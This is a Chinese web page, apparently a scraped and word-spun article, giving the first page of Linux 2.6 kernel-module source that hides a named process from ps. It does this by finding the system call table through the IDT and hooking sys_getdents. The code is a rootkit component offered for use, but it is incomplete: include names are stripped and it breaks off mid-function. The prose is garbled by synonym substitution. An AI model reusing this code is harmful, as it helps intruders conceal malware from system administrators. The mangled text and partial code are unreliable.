<dl id='ea993'></dl>

      <i id='ea993'></i>

        <fieldset id='ea993'></fieldset>
        <ins id='ea993'></ins>
      1. <acronym id='ea993'><em id='ea993'></em><td id='ea993'><div id='ea993'></div></td></acronym><address id='ea993'><big id='ea993'><big id='ea993'></big><legend id='ea993'></legend></big></address>

      2. <tr id='ea993'><strong id='ea993'></strong><small id='ea993'></small><button id='ea993'></button><li id='ea993'><noscript id='ea993'><big id='ea993'></big><dt id='ea993'></dt></noscript></li></tr><ol id='ea993'><table id='ea993'><blockquote id='ea993'><tbody id='ea993'></tbody></blockquote></table></ol><u id='ea993'></u><kbd id='ea993'><kbd id='ea993'></kbd></kbd>
        1. <span id='ea993'></span>
          <i id='ea993'><div id='ea993'><ins id='ea993'></ins></div></i>

          <code id='ea993'><strong id='ea993'></strong></code>

        2. Linux 2.6内核中进程隐藏实现办法

          • 时间:
          • 浏览:6
          • 来源:124软件资讯网

            很早以前的小法式 ,比力简朴可是以为有趣

              原理很简朴 ,Linux检察历程的下令ps是通过系统挪用sys_getdents实现  ,sys_getdents用户获取一个指定路径下的目录条目  ,现实上就是枚举

              /proc/ 下的pid ,这样我们只需要hook一下sys_getdents  ,把响应的要隐藏的pid信息去掉即可  。

              以下是LKM代码 ,在Linux-2.6.14测试并运行乐成

              #include

              #include

              #include

              #include

              #include

              #include

              #include

              #include

              #define CALLOFF 100

              //使用模块参数来界说需要隐藏的历程名

              char *processname;

              module_param(processname, charp, 0);

              struct {

              unsigned short limit;

              unsigned int base;

              } __attribute__ ((packed)) idtr;

              struct {

              unsigned short off1;

              unsigned short sel;

              unsigned char none,

              flags;

              unsigned short off2;

              } __attribute__ ((packed)) * idt;

              void** sys_call_table;

              asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

              char * findoffset(char *start)

              {

              char *p;

              for (p = start; p < start + CALLOFF; p++)

              if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')

              return p;

              return NULL;

              }

              int myatoi(char *str)

              {

              int res = 0;

              int mul = 1;

              char *ptr;

              for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {

              if (*ptr < '0' || *ptr > '9')

              return (-1);

              res += (*ptr - '0') * mul;

              mul *= 10;

              }

              return (res);

              }

              struct task_struct *get_task(pid_t pid)

              {

              struct task_struct *p = get_current(),*entry=NULL;

              list_for_each_entry(entry,&(p->tasks),tasks)

              {

              if(entry->pid == pid)

              {

              printk("pid found\n");

              return entry;

              }

              }

              return NULL;

              }

              static inline char *get_name(struct task_struct *p, char *buf)

              {

              int i;

              char *name;

              name = p->comm;

              i = sizeof(p->comm);

              do {

              unsigned char c = *name;

              name++;

              i--;

              *buf = c;

              if (!c)

              break;

              if (c == '\\') {

              buf[1] = c;

              buf += 2;

              continue;

              }

              if (c == '\n') {

              buf[0] = '\\';

              buf[1] = 'n';

              buf += 2;

              continue;

              }

              buf++;

              }

              while (i);

              *buf = '\n';

              return buf + 1;

              }

              int get_process(pid_t pid)

              {

              struct task_struct *task = get_task(pid);

              char *buffer[64] = {0};

              if (task)

              {

            12下一页